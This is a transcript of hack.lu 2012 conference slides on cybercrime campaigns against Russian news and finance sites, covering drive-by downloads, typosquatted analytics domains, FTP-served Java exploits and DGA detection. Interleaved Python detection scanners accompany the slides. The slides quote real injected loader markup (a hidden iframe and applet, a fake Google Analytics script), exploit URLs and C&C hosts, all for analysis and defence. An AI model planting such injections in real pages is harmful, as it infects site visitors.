hacklu2012 v07

Post on 27-Jan-2015


TRANSCRIPT

CyberCrime 2012 as we know it: Trends, Monitoring, Real Time Detection

@fygrave @vbkropotov

Presented at hack.lu 2012

3

agenda

● CyberCrime 2012: trends
● Malicious campaigns in 2012 (case studies)
● Evolving evasion techniques
● Automating detection in real time
● Conclusions

4

About speakers

● We are from Russia.. kind of ;)

5

Cybercrime 2012: trends

6

Emerging attack vectors

● DbD (drive-by download) – old, still popular
– High profile targets are getting compromised

● Email campaigns – getting bigger, mass mailings to users from compromised targets

● Social Engineering attacks

● Mobile plays active role

7

Malicious Campaigns Sept 2011-Oct 2012

Case studies

8

Autumn 2011: kp.ru, nation-wide newspaper?

● ~550 000 visitors per day

● Drive-By..

9

10

Autumn 2011: rzd.ru, National Railroads?

● ~200 000 visitors per day

● “Gimme a Malware!!”

11

Yepp, rzd-rzd.ru as an intermediate

12

13

Just TWO Domains, SURE?

Domain URL

interfax-rzd.in http://interfax-rzd.in/news/buble.php?key=rtgddfg%26u=root

rzd-interfax-online.in http://rzd-interfax-online.in/rzd-news/buble.php?key=rtgddfg%26u=root

news-rzdstyle.in http://news-rzdstyle.in/new-mail/buble.php?key=rtgddfg%26u=root

rzd-rzd.in http://rzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root

therzd-rzd.in http://therzd-rzd.in/rzd5/buble.php?key=rtgddfg%26u=root

rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/buble.php?key=rtgddfg%26u=root

rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root

rzd-rzdcomp.in http://rzd-rzdcomp.in/rzd5/exe.php?exp=newjava%26key=rtgddfg%26u=root;1

press-rzd.in http://press-rzd.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-press.in http://rzd-press.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-banner.in http://rzd-banner.in/rzd/buble.php?key=rtgddfg%26u=root

pass-rzd.in http://pass-rzd.in/rzd/buble.php?key=rtgddfg%26u=root

rzd-ticket.in http://rzd-ticket.in/zd/buble.php?key=rtgddfg%26u=root

14

Campaign

15

italia-new.in
baner-klerk.ru
bank-klerk.ru
banner-klerk.ru
blogs-klerk.ru
buh-klerk.ru
daily-kp.ru
eg-obzor.ru
forum-klerk.ru
i-obozrevatel.ru
interfax-region.ru
ipgeobase.in
job-klerk.ru
klerk-bank.ru
klerk-bankir.ru
klerk-biz.ru
klerk-boss.ru
klerk-buh.ru
klerk-even.ru
klerk-events.ru
klerk-forum.ru
klerk-law.ru
klerk-new.ru
klerk-news.ru
klerk-reklama.ru
klerk-ru.ru
klerk-work.ru
klerk2.ru
obozrevatel-ru.ru
obozrevatelru.ru
kp-daily.ru
kp-kp.in
minsk-kp.in
perm-kp.in
wiki-klerk.ru

Similar style detected domains

16

Klerk.ru

● Finance related portal

● ~150 000 visitors per day

17

“fileless” bot Campaign 2011 – Oct 2012

● Version 1 (detected) Nov 2011
● Version 2 (detected) Feb-Mar 2012
● Version 3 (detected) May 2012
● Version 4 (detected) first seen in Aug 2012

Last detect in Oct 2012 (distributed via infected banner networks too)

18

glavbukh.ru (Chief Accountant): ~45 000 targeted visitors per day

Date detected | IP | Domain | URL | Domain created | Referrer
09/Nov/2011 | 176.9.50.178 | jya56yhsvcsss.com | /BVRQ | 08/Nov/2011 | glavbukh.ru
11/Nov/2011 | 176.9.50.178 | ha526ugfsfh.com | /BVRQ | 11/Nov/2011 | glavbukh.ru
06/Feb/2012 | 66.199.232.98 | zcxrwuj4b.eu | /GLMF | 26/Jan/2012 | glavbukh.ru
13/Feb/2012 | 66.199.232.9 | zaurona.eu | /GLMF | 08/Feb/2012 | glavbukh.ru
20/Apr/2012 | 64.20.35.194 | vuyrtyal.info | /RK85 | 04/Apr/2012 | glavbukh.ru
03/May/2012 | 64.20.35.194 | hortezam.info | /RK85 | 24/Apr/2012 | glavbukh.ru

19

glavbukh.ru, tks.ru, etc. May 2012

:arg hl=us&source=hp&q=-1785331712&aq=f&aqi=&aql=&oq=

:field Adobe Flash Player 11 ActiveX|1.Conexant 20585 SmartAudio HD|3.ThinkPad Modem Adapter|7.Security Update for Windows XP (KB2079403)|1.Security Update for Windows XP (KB2115168)|1.Security Update for Windows XP (KB2229593)|1.Security Update for Windows

20

Drive-by newsru.com ver. Sept 2012

Domains on Sep 11 2012

21

Permanent fails, fileless bot Campaign 2011 – Oct 2012

● Finance related portal

● ~130 000 visitors per day

<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;">

<applet archive="/07GICjq" code="Applet.class">

Sep 17 2012 echo.msk.ru ~440 000 visitors per day

22

Permanent fails, fileless bot Campaign 2011 – Oct 2012

<iframe src="http://riflepick.net/7GIC"><html lang="en" dir="ltr"><head><body class="normal" cosmic="force" onload="netti()" style="background: #fff; font-face: sans-serif"><div id="duquiddiv"></div><a class="motivator" name="top"></a><div style="display:block;width:1px;height:1px;overflow:hidden;"><applet archive="/07GICjq" code="Applet.class">

Sep 17 2012 Banner network adfox.ru affected
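The injected markup on these two slides hides its loader in a div styled display:block;width:1px;height:1px;overflow:hidden and drops an iframe and a Java applet inside it. As an added example, not code from the talk or from dnslyzer, the Python scanner below walks fetched HTML with the standard library's html.parser and flags iframe/applet/object/embed tags that sit inside such a hidden or one-pixel container, or that are themselves 1x1 or hidden. The sample page and the host names in it are constructed; only the path fragments echo the slide.

```python
# Added example (not from the slides): flag loader tags tucked inside hidden
# or 1x1 containers, the pattern shown in the injected HTML above.
from html.parser import HTMLParser
import re

# display:none / visibility:hidden hide a box outright; a 1px box with
# overflow:hidden needs two of these fragments to count as hidden.
HIDE_OUTRIGHT = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)
TINY_BOX = re.compile(r"overflow\s*:\s*hidden|(?:width|height)\s*:\s*[01]px", re.I)
CONTAINER_TAGS = {"div", "span", "td"}
LOADER_TAGS = {"iframe", "applet", "object", "embed"}


def _is_hidden(attrs):
    """True for the HTML5 hidden attribute, display:none, visibility:hidden,
    or a one-pixel overflow:hidden box (two or more TINY_BOX fragments)."""
    style = attrs.get("style", "")
    return ("hidden" in attrs or HIDE_OUTRIGHT.search(style) is not None
            or len(TINY_BOX.findall(style)) >= 2)


def _is_tiny(attrs):
    """width/height attributes of 0 or 1 pixel."""
    try:
        return int(attrs.get("width", 100)) <= 1 and int(attrs.get("height", 100)) <= 1
    except ValueError:
        return False


class HiddenLoaderFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self._stack = []        # one flag per open container: was it hidden?
        self._hidden_depth = 0  # number of enclosing hidden containers
        self.findings = []      # (tag, resource, reason)

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag in CONTAINER_TAGS:
            hidden = _is_hidden(a)
            self._stack.append(hidden)
            self._hidden_depth += hidden
        if tag in LOADER_TAGS:
            resource = a.get("src") or a.get("data") or a.get("archive") or a.get("code") or ""
            if self._hidden_depth:
                self.findings.append((tag, resource, "inside hidden container"))
            elif _is_tiny(a) or _is_hidden(a):
                self.findings.append((tag, resource, "loader itself hidden or 1x1"))

    def handle_endtag(self, tag):
        if tag in CONTAINER_TAGS and self._stack:
            self._hidden_depth -= self._stack.pop()


def find_hidden_loaders(html):
    """Return [(tag, resource, reason)] for every suspicious loader in the page."""
    parser = HiddenLoaderFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed page: an injected hidden block (host names are placeholders),
# one 1x1 tracking iframe, and one ordinary visible embed.
CONSTRUCTED_PAGE = """<html><head><title>news</title></head><body>
<div id="content"><p>Regular article text.</p></div>
<div style="display:block;width:1px;height:1px;overflow:hidden;">
<iframe src="http://redirector.example/7GIC"></iframe>
<applet archive="/07GICjq" code="Applet.class"></applet>
</div>
<iframe src="http://pixel.example/p" width="1" height="1"></iframe>
<iframe src="http://video.example/embed/1" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, resource, reason in find_hidden_loaders(CONSTRUCTED_PAGE):
        print(f"{tag:7} {resource:35} {reason}")
```

Run it over the HTML a crawler retrieves; a hit on a high-traffic news site is exactly the drive-by pattern these case studies describe. It is a first-pass static check: the evasion section later in the deck explains why crawler-side detection alone is not enough, so a hit is a lead for the sandbox and a miss is no evidence.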

23

Campaign participants examples

Domain | Resource type | When seen | Unique hosts per day
Vesti.ru | TV news | Autumn 2012 | ~930 000
gazeta.ru | news | Winter 2012 – Autumn 2012 | ~490 000
newsru.com | news | Spring 2012 – Autumn 2012 | ~470 000
echo.msk.ru | radio | Autumn 2012 | ~440 000
3DNews.ru | news | Summer 2012 – Autumn 2012 | ~180 000
inosmi.ru | news | Autumn 2011 – Summer 2012 | 115 000
glavbukh.ru | Accountants | Winter 2012 – Spring 2012 | ~45 000
tks.ru | Finance (Import/Export) | Winter 2012 – Autumn 2012 | ~23 000

24

Mobile scam

http://codbanners.ru

25

Mobile scams

● Fake apps are still big

● Android apps avail :)

26

27

• Legal • Faked

Another news, another phone…

28

29

Evolution of Counter-Detection and Evasion Techniques

31

Malware hostings location interesting examples

Countries, hosters and slide with VPN “#epicfail” in configuration.

Sample in gov.ua and Ogni Moskvu bank

32

Drive By from Bank IP range

Date/Time 2011-11-25 15:45:27 MSK
Tag Name Java_Possibly_Malicious_Applet
server 1541897761
URL /dfbgeskdfa/Gmail.class
Packet DestinationAddress 10.X.X.X
Packet DestinationPort 42642
Packet SourceAddress 91.231.126.33
Packet SourcePort 80

netnum: 91.231.126.0 - 91.231.126.255
netname: ognm
organisation: ORG-LCM2-RIPE
org-name: LTD CB "OGNI MOSKVY"
address: 27 st. New Basmannaya
address: 105066, Moscow,
address: Russia
e-mail: info@ognm.ru
phone: +7 495 7805181

Gmail.class - Exploit:Java/CVE-2010-0840

33

Drive By from State Land Cadastral Center at the State Agency of Land Resources of Ukraine Range

Date/Time 2011-11-13 11:34:08 MSK
Tag Name Java_Possibly_Malicious_Applet
server 1539495587
URL /Gmail.class
Packet DestinationAddress 10.X.X.X
Packet DestinationPort 40487
Packet SourceAddress 91.194.214.163
Packet SourcePort 80

netnum: 91.194.214.0 - 91.194.215.255
netname: SLCC
descr: State Land Cadastral Center at the State Agency of Land Resources of Ukraine
country: UA
organisation: ORG-SLCC1-RIPE
address: 3 Narodnogo Opolchenya street, Kiev, Ukraine

Gmail.class - Exploit:Java/CVE-2010-0840

34

Back end epic fail, Mar 13 2011: VPN 95.163.66.197, real 91.194.214.71

Exploit pack in UA State agency of land resources IP range still alive

35

Not typical (now typical :-) attacks: examples

- Attacks using stolen/misconfigured DNS accounts

- Attacks that require real-user interaction

- Intermediate hosts with similar hostnames (to make manual analysis troublesome?)

- Drive by “FTP” types of attacks

36

Stolen domains example:

Time URL IP

24/Jan/2012:18:59:54 GET http://csrv2.fatdiary.org/main.php?page=7a5a09bea4d91836 146.185.242.69

24/Jan/2012:19:00:18 GET http://csrv2.fatdiary.org/content/field.swf HTTP/1.0 146.185.242.69

25/Jan/2012:09:36:31 GET http://csrv15.amurt.org.uk/main.php?page=7a5a09bea4d91836 146.185.242.69

25/Jan/2012:09:36:33 GET http://csrv15.amurt.org.uk/content/fdp2.php?f=17 146.185.242.69

25/Jan/2012:09:36:44 GET http://csrv15.amurt.org.uk/content/field.swf 146.185.242.69

25/Jan/2012:09:36:45 GET http://csrv15.amurt.org.uk/content/v1.jar 146.185.242.69

25/Jan/2012:09:36:48 GET http://csrv15.amurt.org.uk/w.php?f=17%26e=0 146.185.242.69

26/Jan/2012:07:28:05 GET http://csrv23.UIUIopenvrml.org/main.php?page=7a5a09bea4d91836 146.185.242.69

31/Jan/2012:10:27:35 GET http://csrv24.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79

31/Jan/2012:10:27:47 GET http://csrv24.air-bagan.org/content/rino.jar 146.185.242.79

31/Jan/2012:18:18:51 GET http://csrv35.air-bagan.org/main.php?page=7a5a09bea4d91836 146.185.242.79

31/Jan/2012:18:19:03 GET http://csrv35.air-bagan.org/getJavaInfo.jar 146.185.242.79

04/Feb/2012:12:02:51 GET http://csrv29.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79

06/Feb/2012:09:08:51 GET http://csrv89.prawda2.info/main.php?page=7a5a09bea4d91836 146.185.242.79

37

WHAT'S COMMON

amurt.org.uk 46.227.202.68 Registered on: 15-Oct-1999

Name servers: ns1.afraid.org

air-bagan.org 122.155.190.31 Created On:05-Aug-2006

Name Server:NS1.AFRAID.ORG

fatdiary.org 71.237.151.22 Created On:17-Jul-2006

Name Server:NS1.AFRAID.ORG

prawda2.info 91.192.39.83 Created On:18-Oct-2007

Name Server:NS1.AFRAID.ORG

38

Malware domains reputation and DNS accounts attacks

Starting from August 2012 we have detected a second wave of this campaign; be careful. Examples from Sep 2012:

alex01.net -> 46.39.237.81 >>> games.alex01.net -> 178.162.132.178

socceradventure.net 72.8.150.14 >>> mobilki.socceradventure.net -> 178.162.132.178

talleresnahuel.com 74.54.202.162 >>> kino.talleresnahuel.com -> 178.162.132.178

qultivator.se 72.8.150.15 >>> 597821.qultivator.se -> 178.162.132.166

39

Carberp campaign Mar – May 2012 with tiny user interaction

function() { var url = 'http://yyzola.gpbbsdhmjm.shacknet.nu/g/'; … document.onmousemove = function() {

40

Hacked Domains from Spring Carberp campaign

hoster rel-net.eu 62.122.72.0 - 62.122.79.255

009.ru 1.poliklinika72.ru 1c-documents.ru 232info.ru alrf.ru ambulatorya.ru arkan.ru aryahome.ru aryatekstil.ru ato.ru auto-pik.ru bablam.ru badger.ru beauty-breeze.ru berkem.ru bestwatch.ru bounty72.ru bronipoezd.ru car-baby.ru chalet-cpark.ru crocus-hall.ru ct.spb.ru

ctc-tv.ru dailypixel.ru dataplex.ru doctor-istomin.ru draiverton.imho2.ru dtr.by dvvs.ru edimvkusno.ru eka4.ru expert-kld.ru family-fitness.ru fastrans.ru fflow.ru fictionbook.ru flowers-fantasy.ru gidrostyle.ru guitarism.ru hmcity.ru hotel-sokol.ru ipoteka-tmn.ru izvestia.ru

kb83.com knowingsnibiru.ru kolobok80.ru kontaktor.ru kuhni-mila.ru kyokushinkarate.ru laccent.ru lenovofans.ru lifenews.ru maleton.ru mandroid.ru manualbase.ru marianowka.ru marte.ru maxime-and-co.com medin.ru menyaraduet.ru mexa-n.ru molurist.ru mps-energo.ru new.turbinist.ru

oilloot.ru orthographia.ru ostrov72.ru pod-remont.ru region64.ru remont-krasnogorsk.ru revital.ru ribalkadaohota.ru rostteh.ru rstmos.ru russo-excursio.fr sakuraauto.ru sellex.ru shop-detect.ru skk-chess.ru skypecashin.ru spdnv.ru spk-up.ru sport.optika-8.ru stroyoffis.ru stud.samgtu.ru style.aladna.ru

subsidii.net topsalon.ru touravia.ru tushkan.net umade.ru vantatech.ru vash-master-remont.ru videoecology.ru vinils.ru vms56.ru volociki.ru vonny-and-dolan.ru vosesoftware.com winfield-oil.ru wusley.ru yarglobus.ru zip.ru zooeco.com турбинист.рф

41

Domains with interesting names

Intermediate domain names are often similar to the hacked domain name, or to a well-known banner network or counter.

Spot the differences:
● google-analytics.com vs.
● google-analylics.com
● google-anatylics.com

42

Trud.ru affected Feb 21 2012

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>

Name: google-analytics.com Addresses: 173.194.32.48
Name: www.google-analitycs.com Address: 184.82.149.180

43

Noproblemslove.com, whoismistergreen.com, etc...

● Bot infection: Drive-By-HTTP
● Payload and intermediate malware domains: normal / DynDNS
● Distributed via: compromised web-sites
● C&C domains: normal
● C&C and malware domains located on different AS. Sophisticated attack scheme. Timeout before activity.

● Typical bot activity: Mass HTTP Post

44

Noproblemslove.com, whoismistergreen.com, etc...

45

Interesting domains from range 184.82.149.178-184.82.149.180 (Feb 2012)

Domain Name IP

www.google-analylics.com 184.82.149.179

google-anatylics.com 184.82.149.178

www.google-analitycs.com 184.82.149.180

webmaster-google.ru 184.82.149.178

paged2.googlesyndlcation.com 184.82.149.179

googlefilter.ru 184.82.149.179

rambler-analytics.ru 184.82.149.179

site-yandex.net 184.82.149.180

paged2.googlesyndlcation.com 184.82.149.179

www.yandex-analytics.ru 184.82.149.178

googles.4pu.com 184.82.149.178

googleapis.www1.biz 184.82.149.178

syn1-adriver.ru 184.82.149.178
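The domains in this table and in the Trud.ru snippet above imitate google-analytics.com and other trusted hosts in two ways: a one- or two-character edit (google-analylics.com, google-anatylics.com, googlesyndlcation.com) or a brand word dropped into an unrelated zone (webmaster-google.ru, googles.4pu.com, syn1-adriver.ru); the rzd-*.in and klerk-*.ru lists earlier in the deck use the second trick against the hacked sites themselves. As an added example, not part of the talk, this Python check pulls host-like tokens out of page text (so it also sees hosts assembled inside document.write/unescape strings, which a tag parser misses), compares the registrable domain against a constructed allow-list by Levenshtein distance, and falls back to a brand-token rule. The allow-list and brand tokens are assumptions a defender would maintain; registrable-domain extraction is simplified to the last two labels.

```python
# Added example (not from the slides): flag script hosts that imitate trusted
# analytics/ad domains by edit distance or by carrying a brand token.
import re

# Constructed allow-list of registrable domains a defender trusts.
KNOWN_DOMAINS = {"google-analytics.com", "googlesyndication.com", "googleapis.com",
                 "yandex.ru", "rambler.ru", "adriver.ru"}
BRAND_TOKENS = ("google", "yandex", "rambler", "adriver")
FILE_EXTENSIONS = {"js", "css", "php", "html", "htm", "swf", "jar", "class", "gif", "png", "jpg"}
# Anything that looks like a dotted host name, also inside string literals and
# unescape()d fragments, where a tag-based parser would not see it.
HOST_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b", re.I)


def registrable(host):
    """Last two labels; a real deployment would use the public suffix list."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def levenshtein(a, b):
    """Edit distance with the usual dynamic-programming table."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify_host(host):
    """Reason string if host impersonates a protected brand, else None."""
    host = host.lower()
    reg = registrable(host)
    if reg in KNOWN_DOMAINS:
        return None
    for good in sorted(KNOWN_DOMAINS):
        d = levenshtein(reg, good)
        if d <= 2:  # google-analylics.com, google-anatylics.com, googlesyndlcation.com
            return f"lookalike of {good} (edit distance {d})"
    for brand in BRAND_TOKENS:
        if brand in host:  # webmaster-google.ru, googles.4pu.com, syn1-adriver.ru
            return f"brand token '{brand}' outside the allow-listed zones"
    return None


def scan(text):
    """Map every suspicious host found in page/script text to its reason."""
    findings = {}
    for host in sorted(set(HOST_RE.findall(text))):
        if host.rsplit(".", 1)[-1].lower() in FILE_EXTENSIONS:
            continue  # ga.js, field.swf and friends are file names, not hosts
        reason = classify_host(host)
        if reason:
            findings[host.lower()] = reason
    return findings


# Constructed page fragment in the style of the Trud.ru injection above:
# a genuine GA loader followed by a copy pointing at a typo domain.
CONSTRUCTED_SCRIPTS = """
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analitycs.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script src="http://paged2.googlesyndlcation.com/show_ads.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js"></script>
"""

if __name__ == "__main__":
    for host, reason in scan(CONSTRUCTED_SCRIPTS).items():
        print(f"{host:32} {reason}")
```

The distance rule is what catches the typo families in the table; the brand rule is what catches the rest of it. Both need the allow-list to be complete for the brands you protect, otherwise a legitimate regional host (ssl.google-analytics.com, ajax.googleapis.com) would trip the brand rule, which is why the registrable domain is checked against the allow-list first.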

46

C&C domains

whoismistergreen.com

IP-адрес: 213.5.68.105

Create: 2011-07-26

Registrant Name: JOHN ABRAHAM

Address: ul. Dubois 119

City: Lodz

noproblemslove.com

213.5.68.105

Created: 2011-12-07

Registrant Contact:

Whois Privacy Protection Service

Whois Agent gmvjcxkxhs@whoisservices.cn

noproblemsbro.com

176.65.166.28

Created: 2011-12-07

Registrant Contact:

Whois Privacy Protection Service

Whois Agent gmvjcxkxhs@whoisservices.cn

patr1ckjane.com

IP Was 176.65.166.28

IP Now 213.5.68.105

Create: 2011-07-21

Registrant Name: patrick jane

Address: ul. Dubois 119

City: Lodz

47

Not typical attacks via FTP

First seen 24/10/2011 11:28 ftp://1572572686/Main.class

Sample Mar 07: Java version used as the FTP password

48

Domain | URL | Referrer | Payload | Size
3645455029 | /1/s.html | Infected site | html | 997
Java.com | /js/deployJava.js | 3645455029 | javascript | 4923
3645455029 | /1/exp.jar | | application/x-jar | 18046
3645455029 | /file1.dat | | application/executable | 138352

49

Attack analysis

- Script from www.java.com used during the attack

- Applet exp.jar loaded over FTP

- FTP server IP address obfuscated to avoid detection

50

Not Found?

51

Interesting modifications

GET http://java.com/ru/download/windows_ie.jsp?host=java.com%26returnPage=ftp://217.73.58.181/1/s.html%26locale=ru HTTP/1.1

Key feature example

Date/Time 2012-04-20 11:11:49 MSD
Tag Name FTP_Pass
Target IP Address 217.73.63.202
Target Object Name 21
:password Java1.6.0_30@:user anonymous
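The FTP slides write the server as a bare integer (ftp://1572572686/Main.class, 3645455029 in the payload table) and the IDS records earlier in the deck show the same encoding in their server field (1541897761 next to source address 91.231.126.33). As an added example, not from the talk, the Python helpers below normalise such integer, hex or short-form hosts into dotted quads with inet_aton semantics so IP-based rules still match, and pull the JRE version out of an anonymous-FTP password of the form Java<version>@, which is what the FTP_Pass event above captured (Java1.6.0_30@). The IDS field layout ':password <p>:user <u>' is taken from that slide; everything else is this example's own.

```python
# Added example (not from the slides): turn integer-encoded hosts such as
# ftp://1572572686/Main.class back into dotted quads, and spot FTP sessions
# opened by the Java FTP client from its Java<version>@ anonymous password.
import ipaddress
import re
from urllib.parse import urlsplit

# Field layout as in the IDS record on the slide: ":password <p>:user <u>".
FTP_PASS_RE = re.compile(r":password\s+(\S+)\s*:user\s+(\S+)")
JAVA_FTP_PASS = re.compile(r"^Java(\d[\w.]*)@$")


def _parse_part(part):
    """One dotted part with inet_aton rules: 0x.. hex, leading 0 octal, else decimal."""
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def numeric_host_to_ipv4(host):
    """Canonical dotted quad for a host written as 1 to 4 numeric parts
    (inet_aton semantics: the last part absorbs the remaining bytes), else None."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    try:
        nums = [_parse_part(p) for p in parts]
    except ValueError:
        return None  # a normal host name like java.com
    value = 0
    for n in nums[:-1]:
        if not 0 <= n <= 0xFF:
            return None
        value = (value << 8) | n
    last_bits = 32 - 8 * (len(nums) - 1)
    if not 0 <= nums[-1] < 1 << last_bits:
        return None
    return str(ipaddress.IPv4Address((value << last_bits) | nums[-1]))


def normalize_url(url):
    """Rewrite a numeric host to dotted quad so IP-based rules match.
    Returns (normalized_url, original_host) or (url, None) when nothing changed."""
    parts = urlsplit(url)
    ip = numeric_host_to_ipv4(parts.hostname or "")
    if ip is None:
        return url, None
    netloc = ip if parts.port is None else f"{ip}:{parts.port}"
    return parts._replace(netloc=netloc).geturl(), parts.hostname


def java_ftp_client_version(ids_record):
    """JRE version if an anonymous FTP login used the Java<version>@ password
    captured in the FTP_Pass event above, else None."""
    m = FTP_PASS_RE.search(ids_record)
    if not m:
        return None
    password, user = m.groups()
    if user.lower() != "anonymous":
        return None
    jm = JAVA_FTP_PASS.match(password)
    return jm.group(1) if jm else None


if __name__ == "__main__":
    # URLs as they appear on the slides; the hosts decode to ordinary addresses.
    for url in ("ftp://1572572686/Main.class", "ftp://3645455029/1/exp.jar",
                "http://java.com/js/deployJava.js"):
        print(url, "->", normalize_url(url)[0])
    print(java_ftp_client_version(":password Java1.6.0_30@:user anonymous"))
```

Decoding 3645455029 gives 217.73.58.181, the same address the java.com redirect on this slide spells out in its returnPage parameter, so the obfuscation only defeats rules that match on the dotted form. The password check is cheap to run on FTP PASS commands from workstations: a browser fetching a file over FTP does not present a JRE version string, an applet does.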

52

Registrar abuse (1)

● gidzzkc.dogbookeoor-amtuzxo.org. A 91.220.84.7
● yqvdmbul.dogbookeoor-amtuzxo.org. A 91.220.84.7
● fncalzrmx.dogbookeoor-amtuzxo.org. A 91.220.84.7
● ghyyaweczb.dogbookeoor-amtuzxo.org. A 91.220.84.7
● vrmvneod.catxnahi-yarndfhh.info. A 91.220.84.6
● wrxpvxdudahlu.catxnahi-yarndfhh.info. A 91.220.84.6
● owcfudqqlgowwn.catxnahi-yarndfhh.info. A 91.220.84.6
● rskgwknaz.video-zgn-gqmbcax.info. A 91.220.84.6
● ahlcpdmssw.video-zgn-gqmbcax.info. A 91.220.84.6
● xrwxozkniqq.video-zgn-gqmbcax.info. A 91.220.84.6
● ighirfzcxdrii.video-zgn-gqmbcax.info. A 91.220.84.6

53

Registrar abuse (2)

● mlfskgdbwnfos.baseball-payed-mzigsy-voo.org 91.237.153.16

● onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org 91.237.153.16

● Domains disappear without a trace within 30 minutes after use.

54

Registrar abuse (3)

● http://raisport.ru/contacts >>> xugamabpi.arraysort-qmppbkkn-abkn.org

● http://k62cg56m62.dyndns.info/js/vip.php?s=MSIE&n=8 >>> onlkzxxlzbbgiy.payed-football-bciz-ydmslry.org

● http://iked5gikr.ocry.com/do.php >>> fblcatagg.string-panelpvli-qbo-bmvf.org

55

Legit domains are used ..

11.09.2012

http://out1.sudameris.com.ar/out

qehboobwkqvo.task-games-pta-vywcngn.org

91.237.153.24

56

What could be more flux than fastflux? ;-)

● WHOIS fastflux … HOW?!

Domain ID: D166393631-LROR
Domain Name: FOOTBALL-SECURITY-WETRLSGPIEO.ORG
Created On: 21-Aug-2012 01:23:52 UTC
Last Updated On: 21-Aug-2012 01:23:53 UTC
Expiration Date: 21-Aug-2013 01:23:52 UTC
Sponsoring Registrar: Click Registrar, Inc. d/b/a publicdomainregistry.com (R1935-LROR)
Status: CLIENT TRANSFER PROHIBITED
Status: TRANSFER PROHIBITED
Status: ADDPERIOD
Registrant ID: PP-SP-001
Registrant Name: Domain Admin
Registrant Organization: PrivacyProtect.org
Registrant Street1: ID#10760, PO Box 16
Registrant Street2: Note - All Postal Mails Rejected, visit Privacyprotect.org
Registrant Street3:
Registrant City: Nobby Beach
Registrant State/Province:
Registrant Postal Code: QLD 4218
Registrant Country: AU
Registrant Phone: +45.36946676

57

Russian ASN (as5577)

58

Intermediate ev2.ru, SpyEye Campaign

59

Words distribution (len >3) in domain names

60

Incidents vs. time

CIRCL team informed

61

DEMO TIME: SHOW SOME VIDEOZ HERE :)

62

Advanced bots: Social network as C&C

63

Evasion techniques: summary

- Evasion of automated detection of compromised resource (via crawler)
- Evasion of automated detection of compromised resource (via sandbox)
- Evasion techniques used in exploit serving mechanisms and malicious payloads
- Counter-analysis techniques (in infrastructure)

64

Detection 2012

65

Detecting DGA through DNS traffic

Input: DNS packets (passive DNS)

Output:
- list of active domains
- list of “could be active” domains
- list of “were active” domains
- IP addresses used by mal. infrastructure

66

DGA pattern: How it looks on the wire

67

Detecting DGA

● Simplified algorithm:
– take domains with failed DNS lookup (rcode: 2, non-existent domain or rcode: 3, domain name server failed)
– Group them by similarity function f(x)
– Find domains with even distribution.
– Identify other domains matching the same similarity criteria f(x)
– Discover relevant IP addresses
– Rinse and repeat :)

68

Detection: related works

From Throw-Away Traffic to Bots: Detecting the Rise of DGA-Based Malware (Manos Antonakakis, Roberto Perdisci et al.) (2012)

L. Bilge, E. Kirda, C. Kruegel, and M. Balduzzi. EXPOSURE: Finding malicious domains using passive DNS analysis. In Proceedings of NDSS, 2011

etc..

69

What we do differently:

● “lazy” WHOIS lookups, Team Cymru IP-to-ASN lookups

● Our own passive DNS index

● Sandbox farm (mainly to detect compromised websites automagically and study behavior)

70

Architecture

71

Sample analysis (step by step)

● Start looking for a failed pattern and cluster id:

72

Sample analysis (two)

● Get the cluster ID: (eu_11_14)

Clustering is based on domain similarity. Currently used characteristics:
- f(zone, pattern (length, depth))
- additional characteristics (building up): natural language domain vs. generated string (occurrence of two-character sequences – n-grams)
- domain registration parameters (obtained via WHOIS [problematic!])
- cross-reference with existing malicious IP and AS reputation database (incrementally built by us)

73

Sample analysis

● Get other members of the cluster

74

Sample analysis

● Find common members (notice avatarmaker.eu could be a false positive, easily filtered out through common denominator filtering (IP, WHOIS information))

75

Sample analysis

● So we have C&C IP 66.175.210.173

● We can continue mining to see if we get any other domain names:

76

IP → domain transform
